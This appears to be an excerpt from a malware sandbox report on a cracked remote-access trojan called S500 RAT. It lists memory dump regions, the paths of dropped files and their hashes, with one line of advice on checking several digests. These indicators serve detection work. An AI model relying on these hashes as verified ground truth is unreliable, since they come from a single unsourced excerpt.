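Matching on all three digests rather than MD5 alone keeps a single collision-prone algorithm from driving the verdict; the same routine is worth running over every small file in a report before treating a one-byte marker as an artefact worth reversing.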
memory/3136-396-0x0000022916090000-0x00000229160A0000-memory.dmp
memory/3136-403-0x000002292F1C0000-0x000002292F966000-memory.dmp
memory/3136-521-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/1800-522-0x0000000000400000-0x0000000000439000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
| MD5 | 3c2de6bc2aad943c8ccfd2ae1d2db50d |
| SHA1 | 3c909af7b1e92472fec95641cfb0baa65d434886 |
| SHA256 | 27c469c1ab1ecb80bc4fd2d60966174cd973456d584e0aa836811e726550d53d |
| SHA512 | 37a0c33b12cdaf1657f8080e2fe94ba7dc648e514f5ac779c3bb0a7938dfadfb6ee26db0204e10a194645da00883a7a4db2d04bd0850494ba2d12516c344000e |
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
| MD5 | 295a148a835de7e9dcfd7b852631289a |
| SHA1 | 91981906fdf1f36c6f0a2a1243457409588379ae |
| SHA256 | 963bcb01e62f49a6a26320fd1d4c7ba1cc8883de6fb5478bdc1509b3da699e86 |
| SHA512 | 49363841c754d6ddee2c21668a389663065177c3bb97c827925e56c5957e60428bd33f82ce2666587f55cb5fdc15cb9e92708d4d8e2472706253a80e42239a5f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ServerRegistrationManager.exe.log
| MD5 | fa931350508a2b855cce92719c4c207c |
| SHA1 | 3b6eb7b920d1c70b9f61b3745523b20828ecf21b |
| SHA256 | 1b6609def0e3a0533c446233db9438cdc1901a22acae76affbc4866e25595b0f |
| SHA512 | b85d45035b1e62df0c1032c796796f6e30dd03a992744d9a67e0b812b8e4e690b4acc19921931bdac5f0e0cb4d5ef54f2161da3aadc922fee27a3f49fad6a856 |
memory/1224-530-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/1224-531-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-534-0x00007FFC64A30000-0x00007FFC64A57000-memory.dmp
memory/1224-535-0x00007FFC5D0C0000-0x00007FFC5D1EC000-memory.dmp
memory/1224-536-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-537-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-538-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-540-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-539-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-541-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/224-542-0x0000000000400000-0x0000000000439000-memory.dmp
memory/1224-543-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/1224-544-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-547-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-548-0x00007FFC64A30000-0x00007FFC64A57000-memory.dmp
memory/1224-549-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-550-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-551-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-552-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-553-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-555-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-556-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO831A2C0C\Stub.txt
| MD5 | fd7b1162b84b0add4146e3bc0d13b7dd |
| SHA1 | 1fb46807f499267832aa444e12c403df880855bb |
| SHA256 | 972c912943000017fe92e563d4b7a5147f15825718edcb17307af79f85ac5f10 |
| SHA512 | 6f5ff1aff1c899f9ae48cd177fd1bb277b2b9a7395858de1077392c293a4c68307d55d84a7c9968342da5a1296e720b00d8cd6f42b5faa11b7c643260eac300d |